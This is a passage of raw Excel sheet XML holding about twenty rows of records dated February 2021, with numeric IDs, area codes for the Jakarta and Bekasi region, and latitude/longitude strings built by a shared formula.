      <c r="D3093" t="s">
        <v>22</v>
      </c>
      <c r="E3093" t="s">
        <v>23</v>
      </c>
      <c r="F3093" t="s">
        <v>10428</v>
      </c>
      <c r="G3093" t="s">
        <v>10429</v>
      </c>
      <c r="H3093" t="s">
        <v>26</v>
      </c>
      <c r="I3093" t="s">
        <v>1633</v>
      </c>
      <c r="J3093" t="s">
        <v>2627</v>
      </c>
      <c r="L3093" t="s">
        <v>10430</v>
      </c>
      <c r="M3093">
        <v>3275010008</v>
      </c>
      <c r="N3093">
        <v>3275010</v>
      </c>
      <c r="O3093">
        <v>3275</v>
      </c>
      <c r="P3093">
        <v>32</v>
      </c>
      <c r="Q3093" t="s">
        <v>2236</v>
      </c>
      <c r="R3093" t="s">
        <v>287</v>
      </c>
      <c r="S3093" t="s">
        <v>41</v>
      </c>
      <c r="T3093" t="s">
        <v>42</v>
      </c>
      <c r="U3093" s="5">
        <v>10692767</v>
      </c>
      <c r="V3093" s="5" t="s">
        <v>17232</v>
      </c>
      <c r="W3093" s="5">
        <v>-627535</v>
      </c>
      <c r="X3093" t="s">
        <v>20974</v>
      </c>
      <c r="Y3093" t="str">
        <f t="shared" si="48"/>
        <v>-6.27535,106.92767</v>
      </c>
    </row>
    <row r="3094" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3094">
        <v>255334</v>
      </c>
      <c r="B3094" s="1">
        <v>44245</v>
      </c>
      <c r="C3094" s="2">
        <v>0.91532407407407401</v>
      </c>
      <c r="D3094" t="s">
        <v>22</v>
      </c>
      <c r="E3094" t="s">
        <v>23</v>
      </c>
      <c r="F3094" t="s">
        <v>10431</v>
      </c>
      <c r="G3094" t="s">
        <v>10432</v>
      </c>
      <c r="H3094" t="s">
        <v>26</v>
      </c>
      <c r="I3094" t="s">
        <v>1009</v>
      </c>
      <c r="J3094" t="s">
        <v>10433</v>
      </c>
      <c r="L3094" t="s">
        <v>10434</v>
      </c>
      <c r="M3094">
        <v>3172080002</v>
      </c>
      <c r="N3094">
        <v>3172080</v>
      </c>
      <c r="O3094">
        <v>3172</v>
      </c>
      <c r="P3094">
        <v>31</v>
      </c>
      <c r="Q3094" t="s">
        <v>2804</v>
      </c>
      <c r="R3094" t="s">
        <v>141</v>
      </c>
      <c r="S3094" t="s">
        <v>49</v>
      </c>
      <c r="T3094" t="s">
        <v>33</v>
      </c>
      <c r="U3094" s="5">
        <v>10693613</v>
      </c>
      <c r="V3094" s="5" t="s">
        <v>17233</v>
      </c>
      <c r="W3094" s="5">
        <v>-621634</v>
      </c>
      <c r="X3094" t="s">
        <v>20975</v>
      </c>
      <c r="Y3094" t="str">
        <f t="shared" si="48"/>
        <v>-6.21634,106.93613</v>
      </c>
    </row>
    <row r="3095" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3095">
        <v>255335</v>
      </c>
      <c r="B3095" s="1">
        <v>44245</v>
      </c>
      <c r="C3095" s="2">
        <v>0.91581018518518509</v>
      </c>
      <c r="D3095" t="s">
        <v>22</v>
      </c>
      <c r="E3095" t="s">
        <v>23</v>
      </c>
      <c r="F3095" t="s">
        <v>10435</v>
      </c>
      <c r="G3095" t="s">
        <v>10436</v>
      </c>
      <c r="H3095" t="s">
        <v>26</v>
      </c>
      <c r="I3095" t="s">
        <v>1683</v>
      </c>
      <c r="J3095" t="s">
        <v>2627</v>
      </c>
      <c r="L3095" t="s">
        <v>10437</v>
      </c>
      <c r="M3095">
        <v>3275060001</v>
      </c>
      <c r="N3095">
        <v>3275060</v>
      </c>
      <c r="O3095">
        <v>3275</v>
      </c>
      <c r="P3095">
        <v>32</v>
      </c>
      <c r="Q3095" t="s">
        <v>611</v>
      </c>
      <c r="R3095" t="s">
        <v>114</v>
      </c>
      <c r="S3095" t="s">
        <v>41</v>
      </c>
      <c r="T3095" t="s">
        <v>42</v>
      </c>
      <c r="U3095" s="5">
        <v>10695336</v>
      </c>
      <c r="V3095" s="5" t="s">
        <v>17234</v>
      </c>
      <c r="W3095" s="5">
        <v>-623330</v>
      </c>
      <c r="X3095" t="s">
        <v>20976</v>
      </c>
      <c r="Y3095" t="str">
        <f t="shared" si="48"/>
        <v>-6.23330,106.95336</v>
      </c>
    </row>
    <row r="3096" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3096">
        <v>255336</v>
      </c>
      <c r="B3096" s="1">
        <v>44245</v>
      </c>
      <c r="C3096" s="2">
        <v>0.9175578703703704</v>
      </c>
      <c r="D3096" t="s">
        <v>22</v>
      </c>
      <c r="E3096" t="s">
        <v>23</v>
      </c>
      <c r="F3096" t="s">
        <v>10438</v>
      </c>
      <c r="G3096" t="s">
        <v>10439</v>
      </c>
      <c r="H3096" t="s">
        <v>26</v>
      </c>
      <c r="I3096" t="s">
        <v>137</v>
      </c>
      <c r="J3096" t="s">
        <v>2627</v>
      </c>
      <c r="M3096">
        <v>3275010011</v>
      </c>
      <c r="N3096">
        <v>3275010</v>
      </c>
      <c r="O3096">
        <v>3275</v>
      </c>
      <c r="P3096">
        <v>32</v>
      </c>
      <c r="Q3096" t="s">
        <v>2389</v>
      </c>
      <c r="R3096" t="s">
        <v>287</v>
      </c>
      <c r="S3096" t="s">
        <v>41</v>
      </c>
      <c r="T3096" t="s">
        <v>42</v>
      </c>
      <c r="U3096" s="5">
        <v>10692216</v>
      </c>
      <c r="V3096" s="5" t="s">
        <v>17235</v>
      </c>
      <c r="W3096" s="5">
        <v>-625947</v>
      </c>
      <c r="X3096" t="s">
        <v>20977</v>
      </c>
      <c r="Y3096" t="str">
        <f t="shared" si="48"/>
        <v>-6.25947,106.92216</v>
      </c>
    </row>
    <row r="3097" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3097">
        <v>255343</v>
      </c>
      <c r="B3097" s="1">
        <v>44245</v>
      </c>
      <c r="C3097" s="2">
        <v>0.92083333333333339</v>
      </c>
      <c r="D3097" t="s">
        <v>2648</v>
      </c>
      <c r="E3097" t="s">
        <v>23</v>
      </c>
      <c r="G3097" t="s">
        <v>10440</v>
      </c>
      <c r="H3097" t="s">
        <v>26</v>
      </c>
      <c r="J3097" t="s">
        <v>2657</v>
      </c>
      <c r="L3097" t="s">
        <v>10441</v>
      </c>
      <c r="M3097">
        <v>3172070003</v>
      </c>
      <c r="N3097">
        <v>3172070</v>
      </c>
      <c r="O3097">
        <v>3172</v>
      </c>
      <c r="P3097">
        <v>31</v>
      </c>
      <c r="Q3097" t="s">
        <v>2659</v>
      </c>
      <c r="R3097" t="s">
        <v>128</v>
      </c>
      <c r="S3097" t="s">
        <v>49</v>
      </c>
      <c r="T3097" t="s">
        <v>33</v>
      </c>
      <c r="U3097" s="5">
        <v>10693098</v>
      </c>
      <c r="V3097" s="5" t="s">
        <v>17236</v>
      </c>
      <c r="W3097" s="5">
        <v>-623914</v>
      </c>
      <c r="X3097" t="s">
        <v>20978</v>
      </c>
      <c r="Y3097" t="str">
        <f t="shared" si="48"/>
        <v>-6.23914,106.93098</v>
      </c>
    </row>
    <row r="3098" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3098">
        <v>255346</v>
      </c>
      <c r="B3098" s="1">
        <v>44245</v>
      </c>
      <c r="C3098" s="2">
        <v>0.92450231481481471</v>
      </c>
      <c r="D3098" t="s">
        <v>22</v>
      </c>
      <c r="E3098" t="s">
        <v>23</v>
      </c>
      <c r="F3098" t="s">
        <v>10442</v>
      </c>
      <c r="G3098" t="s">
        <v>10443</v>
      </c>
      <c r="H3098" t="s">
        <v>26</v>
      </c>
      <c r="I3098" t="s">
        <v>65</v>
      </c>
      <c r="J3098" t="s">
        <v>4162</v>
      </c>
      <c r="L3098" t="s">
        <v>10444</v>
      </c>
      <c r="M3098">
        <v>3172040005</v>
      </c>
      <c r="N3098">
        <v>3172040</v>
      </c>
      <c r="O3098">
        <v>3172</v>
      </c>
      <c r="P3098">
        <v>31</v>
      </c>
      <c r="Q3098" t="s">
        <v>1351</v>
      </c>
      <c r="R3098" t="s">
        <v>281</v>
      </c>
      <c r="S3098" t="s">
        <v>49</v>
      </c>
      <c r="T3098" t="s">
        <v>33</v>
      </c>
      <c r="U3098" s="5">
        <v>10690220</v>
      </c>
      <c r="V3098" s="5" t="s">
        <v>16592</v>
      </c>
      <c r="W3098" s="5">
        <v>-624743</v>
      </c>
      <c r="X3098" t="s">
        <v>20979</v>
      </c>
      <c r="Y3098" t="str">
        <f t="shared" si="48"/>
        <v>-6.24743,106.90220</v>
      </c>
    </row>
    <row r="3099" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3099">
        <v>255359</v>
      </c>
      <c r="B3099" s="1">
        <v>44245</v>
      </c>
      <c r="C3099" s="2">
        <v>0.91180555555555554</v>
      </c>
      <c r="D3099" t="s">
        <v>2648</v>
      </c>
      <c r="E3099" t="s">
        <v>23</v>
      </c>
      <c r="G3099" t="s">
        <v>10445</v>
      </c>
      <c r="H3099" t="s">
        <v>26</v>
      </c>
      <c r="J3099" t="s">
        <v>8233</v>
      </c>
      <c r="L3099" t="s">
        <v>10446</v>
      </c>
      <c r="M3099">
        <v>3172020005</v>
      </c>
      <c r="N3099">
        <v>3172020</v>
      </c>
      <c r="O3099">
        <v>3172</v>
      </c>
      <c r="P3099">
        <v>31</v>
      </c>
      <c r="Q3099" t="s">
        <v>3744</v>
      </c>
      <c r="R3099" t="s">
        <v>1644</v>
      </c>
      <c r="S3099" t="s">
        <v>49</v>
      </c>
      <c r="T3099" t="s">
        <v>33</v>
      </c>
      <c r="U3099" s="5">
        <v>10687443</v>
      </c>
      <c r="V3099" s="5" t="s">
        <v>17237</v>
      </c>
      <c r="W3099" s="5">
        <v>-630214</v>
      </c>
      <c r="X3099" t="s">
        <v>20980</v>
      </c>
      <c r="Y3099" t="str">
        <f t="shared" si="48"/>
        <v>-6.30214,106.87443</v>
      </c>
    </row>
    <row r="3100" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3100">
        <v>255360</v>
      </c>
      <c r="B3100" s="1">
        <v>44245</v>
      </c>
      <c r="C3100" s="2">
        <v>0.91319444444444453</v>
      </c>
      <c r="D3100" t="s">
        <v>2648</v>
      </c>
      <c r="E3100" t="s">
        <v>23</v>
      </c>
      <c r="G3100" t="s">
        <v>10447</v>
      </c>
      <c r="H3100" t="s">
        <v>26</v>
      </c>
      <c r="J3100" t="s">
        <v>10448</v>
      </c>
      <c r="L3100" t="s">
        <v>2794</v>
      </c>
      <c r="M3100">
        <v>3172070002</v>
      </c>
      <c r="N3100">
        <v>3172070</v>
      </c>
      <c r="O3100">
        <v>3172</v>
      </c>
      <c r="P3100">
        <v>31</v>
      </c>
      <c r="Q3100" t="s">
        <v>128</v>
      </c>
      <c r="R3100" t="s">
        <v>128</v>
      </c>
      <c r="S3100" t="s">
        <v>49</v>
      </c>
      <c r="T3100" t="s">
        <v>33</v>
      </c>
      <c r="U3100" s="5">
        <v>10692059</v>
      </c>
      <c r="V3100" s="5" t="s">
        <v>17238</v>
      </c>
      <c r="W3100" s="5">
        <v>-623238</v>
      </c>
      <c r="X3100" t="s">
        <v>20981</v>
      </c>
      <c r="Y3100" t="str">
        <f t="shared" si="48"/>
        <v>-6.23238,106.92059</v>
      </c>
    </row>
    <row r="3101" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3101">
        <v>255364</v>
      </c>
      <c r="B3101" s="1">
        <v>44245</v>
      </c>
      <c r="C3101" s="2">
        <v>0.93186342592592597</v>
      </c>
      <c r="D3101" t="s">
        <v>22</v>
      </c>
      <c r="E3101" t="s">
        <v>23</v>
      </c>
      <c r="F3101" t="s">
        <v>10449</v>
      </c>
      <c r="H3101" t="s">
        <v>26</v>
      </c>
      <c r="I3101" t="s">
        <v>271</v>
      </c>
      <c r="J3101" t="s">
        <v>2845</v>
      </c>
      <c r="L3101" t="s">
        <v>10450</v>
      </c>
      <c r="M3101">
        <v>3172070003</v>
      </c>
      <c r="N3101">
        <v>3172070</v>
      </c>
      <c r="O3101">
        <v>3172</v>
      </c>
      <c r="P3101">
        <v>31</v>
      </c>
      <c r="Q3101" t="s">
        <v>2659</v>
      </c>
      <c r="R3101" t="s">
        <v>128</v>
      </c>
      <c r="S3101" t="s">
        <v>49</v>
      </c>
      <c r="T3101" t="s">
        <v>33</v>
      </c>
      <c r="U3101" s="5">
        <v>10693145</v>
      </c>
      <c r="V3101" s="5" t="s">
        <v>17239</v>
      </c>
      <c r="W3101" s="5">
        <v>-623546</v>
      </c>
      <c r="X3101" t="s">
        <v>20982</v>
      </c>
      <c r="Y3101" t="str">
        <f t="shared" si="48"/>
        <v>-6.23546,106.93145</v>
      </c>
    </row>
    <row r="3102" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3102">
        <v>255365</v>
      </c>
      <c r="B3102" s="1">
        <v>44245</v>
      </c>
      <c r="C3102" s="2">
        <v>0.93385416666666676</v>
      </c>
      <c r="D3102" t="s">
        <v>22</v>
      </c>
      <c r="E3102" t="s">
        <v>23</v>
      </c>
      <c r="F3102" t="s">
        <v>10451</v>
      </c>
      <c r="H3102" t="s">
        <v>26</v>
      </c>
      <c r="I3102" t="s">
        <v>72</v>
      </c>
      <c r="J3102" t="s">
        <v>6293</v>
      </c>
      <c r="L3102" t="s">
        <v>10452</v>
      </c>
      <c r="M3102">
        <v>3172050005</v>
      </c>
      <c r="N3102">
        <v>3172050</v>
      </c>
      <c r="O3102">
        <v>3172</v>
      </c>
      <c r="P3102">
        <v>31</v>
      </c>
      <c r="Q3102" t="s">
        <v>358</v>
      </c>
      <c r="R3102" t="s">
        <v>358</v>
      </c>
      <c r="S3102" t="s">
        <v>49</v>
      </c>
      <c r="T3102" t="s">
        <v>33</v>
      </c>
      <c r="U3102" s="5">
        <v>10687405</v>
      </c>
      <c r="V3102" s="5" t="s">
        <v>17240</v>
      </c>
      <c r="W3102" s="5">
        <v>-628176</v>
      </c>
      <c r="X3102" t="s">
        <v>20983</v>
      </c>
      <c r="Y3102" t="str">
        <f t="shared" si="48"/>
        <v>-6.28176,106.87405</v>
      </c>
    </row>
    <row r="3103" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3103">
        <v>255373</v>
      </c>
      <c r="B3103" s="1">
        <v>44245</v>
      </c>
      <c r="C3103" s="2">
        <v>0.93652777777777774</v>
      </c>
      <c r="D3103" t="s">
        <v>22</v>
      </c>
      <c r="E3103" t="s">
        <v>23</v>
      </c>
      <c r="F3103" t="s">
        <v>10453</v>
      </c>
      <c r="H3103" t="s">
        <v>26</v>
      </c>
      <c r="I3103" t="s">
        <v>555</v>
      </c>
      <c r="J3103" t="s">
        <v>2868</v>
      </c>
      <c r="L3103" t="s">
        <v>10454</v>
      </c>
      <c r="M3103">
        <v>3172080001</v>
      </c>
      <c r="N3103">
        <v>3172080</v>
      </c>
      <c r="O3103">
        <v>3172</v>
      </c>
      <c r="P3103">
        <v>31</v>
      </c>
      <c r="Q3103" t="s">
        <v>48</v>
      </c>
      <c r="R3103" t="s">
        <v>141</v>
      </c>
      <c r="S3103" t="s">
        <v>49</v>
      </c>
      <c r="T3103" t="s">
        <v>33</v>
      </c>
      <c r="U3103" s="5">
        <v>10690324</v>
      </c>
      <c r="V3103" s="5" t="s">
        <v>17241</v>
      </c>
      <c r="W3103" s="5">
        <v>-620833</v>
      </c>
      <c r="X3103" t="s">
        <v>20984</v>
      </c>
      <c r="Y3103" t="str">
        <f t="shared" si="48"/>
        <v>-6.20833,106.90324</v>
      </c>
    </row>
    <row r="3104" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3104">
        <v>255451</v>
      </c>
      <c r="B3104" s="1">
        <v>44245</v>
      </c>
      <c r="C3104" s="2">
        <v>0.97071759259259249</v>
      </c>
      <c r="D3104" t="s">
        <v>22</v>
      </c>
      <c r="E3104" t="s">
        <v>23</v>
      </c>
      <c r="F3104" t="s">
        <v>10455</v>
      </c>
      <c r="G3104" t="s">
        <v>10456</v>
      </c>
      <c r="H3104" t="s">
        <v>26</v>
      </c>
      <c r="I3104" t="s">
        <v>886</v>
      </c>
      <c r="J3104" t="s">
        <v>2627</v>
      </c>
      <c r="L3104" t="s">
        <v>4103</v>
      </c>
      <c r="M3104">
        <v>3275060002</v>
      </c>
      <c r="N3104">
        <v>3275060</v>
      </c>
      <c r="O3104">
        <v>3275</v>
      </c>
      <c r="P3104">
        <v>32</v>
      </c>
      <c r="Q3104" t="s">
        <v>113</v>
      </c>
      <c r="R3104" t="s">
        <v>114</v>
      </c>
      <c r="S3104" t="s">
        <v>41</v>
      </c>
      <c r="T3104" t="s">
        <v>42</v>
      </c>
      <c r="U3104" s="5">
        <v>10695342</v>
      </c>
      <c r="V3104" s="5" t="s">
        <v>17242</v>
      </c>
      <c r="W3104" s="5">
        <v>-623060</v>
      </c>
      <c r="X3104" t="s">
        <v>20985</v>
      </c>
      <c r="Y3104" t="str">
        <f t="shared" si="48"/>
        <v>-6.23060,106.95342</v>
      </c>
    </row>
    <row r="3105" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3105">
        <v>255452</v>
      </c>
      <c r="B3105" s="1">
        <v>44245</v>
      </c>
      <c r="C3105" s="2">
        <v>0.97196759259259258</v>
      </c>
      <c r="D3105" t="s">
        <v>22</v>
      </c>
      <c r="E3105" t="s">
        <v>23</v>
      </c>
      <c r="F3105" t="s">
        <v>10457</v>
      </c>
      <c r="G3105" t="s">
        <v>10458</v>
      </c>
      <c r="H3105" t="s">
        <v>26</v>
      </c>
      <c r="I3105" t="s">
        <v>271</v>
      </c>
      <c r="J3105" t="s">
        <v>2868</v>
      </c>
      <c r="M3105">
        <v>3172080001</v>
      </c>
      <c r="N3105">
        <v>3172080</v>
      </c>
      <c r="O3105">
        <v>3172</v>
      </c>
      <c r="P3105">
        <v>31</v>
      </c>
      <c r="Q3105" t="s">
        <v>48</v>
      </c>
      <c r="R3105" t="s">
        <v>141</v>
      </c>
      <c r="S3105" t="s">
        <v>49</v>
      </c>
      <c r="T3105" t="s">
        <v>33</v>
      </c>
      <c r="U3105" s="5">
        <v>10690427</v>
      </c>
      <c r="V3105" s="5" t="s">
        <v>17243</v>
      </c>
      <c r="W3105" s="5">
        <v>-620801</v>
      </c>
      <c r="X3105" t="s">
        <v>20986</v>
      </c>
      <c r="Y3105" t="str">
        <f t="shared" si="48"/>
        <v>-6.20801,106.90427</v>
      </c>
    </row>
    <row r="3106" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3106">
        <v>255467</v>
      </c>
      <c r="B3106" s="1">
        <v>44245</v>
      </c>
      <c r="C3106" s="2">
        <v>0.97990740740740734</v>
      </c>
      <c r="D3106" t="s">
        <v>22</v>
      </c>
      <c r="E3106" t="s">
        <v>23</v>
      </c>
      <c r="F3106" t="s">
        <v>10459</v>
      </c>
      <c r="G3106" t="s">
        <v>10460</v>
      </c>
      <c r="H3106" t="s">
        <v>26</v>
      </c>
      <c r="I3106" t="s">
        <v>27</v>
      </c>
      <c r="J3106" t="s">
        <v>2627</v>
      </c>
      <c r="L3106" t="s">
        <v>10461</v>
      </c>
      <c r="M3106">
        <v>3275010010</v>
      </c>
      <c r="N3106">
        <v>3275010</v>
      </c>
      <c r="O3106">
        <v>3275</v>
      </c>
      <c r="P3106">
        <v>32</v>
      </c>
      <c r="Q3106" t="s">
        <v>286</v>
      </c>
      <c r="R3106" t="s">
        <v>287</v>
      </c>
      <c r="S3106" t="s">
        <v>41</v>
      </c>
      <c r="T3106" t="s">
        <v>42</v>
      </c>
      <c r="U3106" s="5">
        <v>10694848</v>
      </c>
      <c r="V3106" s="5" t="s">
        <v>17244</v>
      </c>
      <c r="W3106" s="5">
        <v>-626229</v>
      </c>
      <c r="X3106" t="s">
        <v>20834</v>
      </c>
      <c r="Y3106" t="str">
        <f t="shared" si="48"/>
        <v>-6.26229,106.94848</v>
      </c>
    </row>
    <row r="3107" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3107">
        <v>255475</v>
      </c>
      <c r="B3107" s="1">
        <v>44245</v>
      </c>
      <c r="C3107" s="2">
        <v>0.98077546296296303</v>
      </c>
      <c r="D3107" t="s">
        <v>22</v>
      </c>
      <c r="E3107" t="s">
        <v>23</v>
      </c>
      <c r="F3107" t="s">
        <v>10462</v>
      </c>
      <c r="G3107" t="s">
        <v>10463</v>
      </c>
      <c r="H3107" t="s">
        <v>26</v>
      </c>
      <c r="I3107" t="s">
        <v>1046</v>
      </c>
      <c r="J3107" t="s">
        <v>2627</v>
      </c>
      <c r="L3107" t="s">
        <v>4103</v>
      </c>
      <c r="M3107">
        <v>3275060002</v>
      </c>
      <c r="N3107">
        <v>3275060</v>
      </c>
      <c r="O3107">
        <v>3275</v>
      </c>
      <c r="P3107">
        <v>32</v>
      </c>
      <c r="Q3107" t="s">
        <v>113</v>
      </c>
      <c r="R3107" t="s">
        <v>114</v>
      </c>
      <c r="S3107" t="s">
        <v>41</v>
      </c>
      <c r="T3107" t="s">
        <v>42</v>
      </c>
      <c r="U3107" s="5">
        <v>10695314</v>
      </c>
      <c r="V3107" s="5" t="s">
        <v>17245</v>
      </c>
      <c r="W3107" s="5">
        <v>-623051</v>
      </c>
      <c r="X3107" t="s">
        <v>20331</v>
      </c>
      <c r="Y3107" t="str">
        <f t="shared" si="48"/>
        <v>-6.23051,106.95314</v>
      </c>
    </row>
    <row r="3108" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3108">
        <v>255476</v>
      </c>
      <c r="B3108" s="1">
        <v>44245</v>
      </c>
      <c r="C3108" s="2">
        <v>0.98376157407407405</v>
      </c>
      <c r="D3108" t="s">
        <v>22</v>
      </c>
      <c r="E3108" t="s">
        <v>23</v>
      </c>
      <c r="F3108" t="s">
        <v>10464</v>
      </c>
      <c r="G3108" t="s">
        <v>10465</v>
      </c>
      <c r="H3108" t="s">
        <v>26</v>
      </c>
      <c r="I3108" t="s">
        <v>137</v>
      </c>
      <c r="J3108" t="s">
        <v>6354</v>
      </c>
      <c r="L3108" t="s">
        <v>10466</v>
      </c>
      <c r="M3108">
        <v>3172040002</v>
      </c>
      <c r="N3108">
        <v>3172040</v>
      </c>
      <c r="O3108">
        <v>3172</v>
      </c>
      <c r="P3108">
        <v>31</v>
      </c>
      <c r="Q3108" t="s">
        <v>281</v>
      </c>
      <c r="R3108" t="s">
        <v>281</v>
      </c>
      <c r="S3108" t="s">
        <v>49</v>
      </c>
      <c r="T3108" t="s">
        <v>33</v>
      </c>
      <c r="U3108" s="5">
        <v>10688018</v>
      </c>
      <c r="V3108" s="5" t="s">
        <v>17246</v>
      </c>
      <c r="W3108" s="5">
        <v>-627511</v>
      </c>
      <c r="X3108" t="s">
        <v>20987</v>
      </c>
      <c r="Y3108" t="str">
        <f t="shared" si="48"/>
        <v>-6.27511,106.88018</v>
      </c>
    </row>
    <row r="3109" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3109">
        <v>255485</v>
      </c>
      <c r="B3109" s="1">
        <v>44245</v>
      </c>
      <c r="C3109" s="2">
        <v>0.98541666666666661</v>
      </c>
      <c r="D3109" t="s">
        <v>2648</v>
      </c>
      <c r="E3109" t="s">
        <v>23</v>
      </c>
      <c r="G3109" t="s">
        <v>10467</v>
      </c>
      <c r="H3109" t="s">
        <v>26</v>
      </c>
      <c r="J3109" t="s">
        <v>2580</v>
      </c>
      <c r="L3109" t="s">
        <v>10468</v>
      </c>
      <c r="M3109">
        <v>3172040005</v>
      </c>
      <c r="N3109">
        <v>3172040</v>
      </c>
      <c r="O3109">
        <v>3172</v>
      </c>
      <c r="P3109">
        <v>31</v>
      </c>
      <c r="Q3109" t="s">
        <v>1351</v>
      </c>
      <c r="R3109" t="s">
        <v>281</v>
      </c>
      <c r="S3109" t="s">
        <v>49</v>
      </c>
      <c r="T3109" t="s">
        <v>33</v>
      </c>
      <c r="U3109" s="5">
        <v>10689378</v>
      </c>
      <c r="V3109" s="5" t="s">
        <v>16273</v>
      </c>
      <c r="W3109" s="5">
        <v>-624108</v>
      </c>
      <c r="X3109" t="s">
        <v>20988</v>
      </c>
      <c r="Y3109" t="str">
        <f t="shared" si="48"/>
        <v>-6.24108,106.89378</v>
      </c>
    </row>
    <row r="3110" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3110">
        <v>255584</v>
      </c>
      <c r="B3110" s="1">
        <v>44245</v>
      </c>
      <c r="C3110" s="2">
        <v>0.93680555555555556</v>
      </c>
      <c r="D3110" t="s">
        <v>2648</v>
      </c>
      <c r="E3110" t="s">
        <v>23</v>
      </c>
      <c r="G3110" t="s">
        <v>10469</v>
      </c>
      <c r="H3110" t="s">
        <v>26</v>
      </c>
      <c r="J3110" t="s">
        <v>10470</v>
      </c>
      <c r="L3110" t="s">
        <v>10471</v>
      </c>
      <c r="M3110">
        <v>3172080002</v>
      </c>
      <c r="N3110">
        <v>3172080</v>
      </c>
      <c r="O3110">
        <v>3172</v>
      </c>
      <c r="P3110">
        <v>31</v>
      </c>
      <c r="Q3110" t="s">
        <v>2804</v>
      </c>
      <c r="R3110" t="s">
        <v>141</v>
      </c>
      <c r="S3110" t="s">
        <v>49</v>
      </c>
      <c r="T3110" t="s">
        <v>33</v>
      </c>
      <c r="U3110" s="5">
        <v>10693370</v>
      </c>
      <c r="V3110" s="5" t="s">
        <v>17247</v>
      </c>
      <c r="W3110" s="5">
        <v>-621446</v>
      </c>
      <c r="X3110" t="s">
        <v>20105</v>
      </c>
      <c r="Y3110" t="str">
        <f t="shared" si="48"/>
        <v>-6.21446,106.93370</v>
      </c>
    </row>
    <row r="3111" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3111">
        <v>255532</v>
      </c>
      <c r="B3111" s="1">
        <v>44246</v>
      </c>
      <c r="C3111" s="2">
        <v>6.2731481481481484E-3</v>
      </c>
      <c r="D3111" t="s">
        <v>22</v>
      </c>
      <c r="E3111" t="s">
        <v>23</v>
      </c>
      <c r="F3111" t="s">
        <v>10472</v>
      </c>
      <c r="G3111" t="s">
        <v>10473</v>
      </c>
      <c r="H3111" t="s">
        <v>26</v>
      </c>
      <c r="I3111" t="s">
        <v>2134</v>
      </c>
      <c r="J3111" t="s">
        <v>2580</v>
      </c>
      <c r="L3111" t="s">
        <v>10474</v>
      </c>
      <c r="M3111">
        <v>3172040005</v>
      </c>
      <c r="N3111">
        <v>3172040</v>
      </c>
      <c r="O3111">
        <v>3172</v>
      </c>
      <c r="P3111">
        <v>31</v>
      </c>
      <c r="Q3111" t="s">
        <v>1351</v>
      </c>
      <c r="R3111" t="s">
        <v>281</v>
      </c>
      <c r="S3111" t="s">
        <v>49</v>
      </c>
      <c r="T3111" t="s">
        <v>33</v>
      </c>
      <c r="U3111" s="5">
        <v>10689436</v>
      </c>
      <c r="V3111" s="5" t="s">
        <v>17248</v>
      </c>
      <c r="W3111" s="5">
        <v>-624090</v>
      </c>
      <c r="X3111" t="s">
        <v>20989</v>
      </c>
      <c r="Y3111" t="str">
        <f t="shared" si="48"/>
        <v>-6.24090,106.89436</v>
      </c>
    </row>
    <row r="3112" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3112">
        <v>255541</v>
      </c>
      <c r="B3112" s="1">
        <v>44246</v>
      </c>
      <c r="C3112" s="2">
        <v>1.0659722222222221E-2</v>
      </c>
      <c r="D3112" t="s">
        <v>22</v>
      </c>
      <c r="E3112" t="s">
        <v>23</v>
      </c>
      <c r="F3112" t="s">
        <v>10475</v>
      </c>
      <c r="G3112" t="s">
        <v>10476</v>
      </c>
      <c r="H3112" t="s">
        <v>26</v>
      </c>
      <c r="I3112" t="s">
        <v>10477</v>
      </c>
      <c r="J3112" t="s">
        <v>1471</v>
      </c>
      <c r="L3112" t="s">
        <v>10478</v>
      </c>
      <c r="M3112">
        <v>3171100001</v>
      </c>
      <c r="N3112">
        <v>3171100</v>
      </c>
      <c r="O3112">
        <v>3171</v>
      </c>
      <c r="P3112">
        <v>31</v>
      </c>
      <c r="Q3112" t="s">
        <v>1474</v>
      </c>
      <c r="R3112" t="s">
        <v>107</v>
      </c>
      <c r="S3112" t="s">
        <v>108</v>
      </c>
      <c r="T3112" t="s">
        <v>33</v>
      </c>
      <c r="U3112" s="5">
        <v>10681765</v>
      </c>
      <c r="V3112" s="5" t="s">
        <v>17249</v>
      </c>
      <c r="W3112" s="5">
        <v>-622319</v>
      </c>
      <c r="X3112" t="s">
        <v>20990</v>
      </c>
      <c r="Y3112" t="str">
        <f t="shared" si="48"/>
        <v>-6.22319,106.81765</v>
      </c>
    </row>
    <row r="3113" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3113">
        <v>255574</v>
      </c>
      <c r="B3113" s="1">
        <v>44246</v>
      </c>
      <c r="C3113" s="2">
        <v>2.3182870370370371E-2</v>
      </c>
      <c r="D3113" t="s">
        <v>22</v>
      </c>
      <c r="E3113" t="s">
        <v>23</v>
      </c>
      <c r="F3113" t="s">
        <v>10479</v>
      </c>
      <c r="H3113" t="s">
        <v>26</v>
      </c>
      <c r="I3113" t="s">
        <v>517</v>
      </c>
      <c r="J3113" t="s">
        <v>2627</v>
      </c>
      <c r="L3113" t="s">
        <v>10480</v>
      </c>
      <c r="M3113">
        <v>3275010010</v>
      </c>
      <c r="N3113">
        <v>3275010</v>
      </c>
      <c r="O3113">
        <v>3275</v>
      </c>
      <c r="P3113">
        <v>32</v>
      </c>
      <c r="Q3113" t="s">
        <v>286</v>
      </c>
      <c r="R3113" t="s">
        <v>287</v>
      </c>
      <c r="S3113" t="s">
        <v>41</v>
      </c>
      <c r="T3113" t="s">
        <v>42</v>
      </c>
      <c r="U3113" s="5">
        <v>10694824</v>
      </c>
      <c r="V3113" s="5" t="s">
        <v>17250</v>
      </c>
      <c r="W3113" s="5">
        <v>-626580</v>
      </c>
      <c r="X3113" t="s">
        <v>20991</v>
      </c>
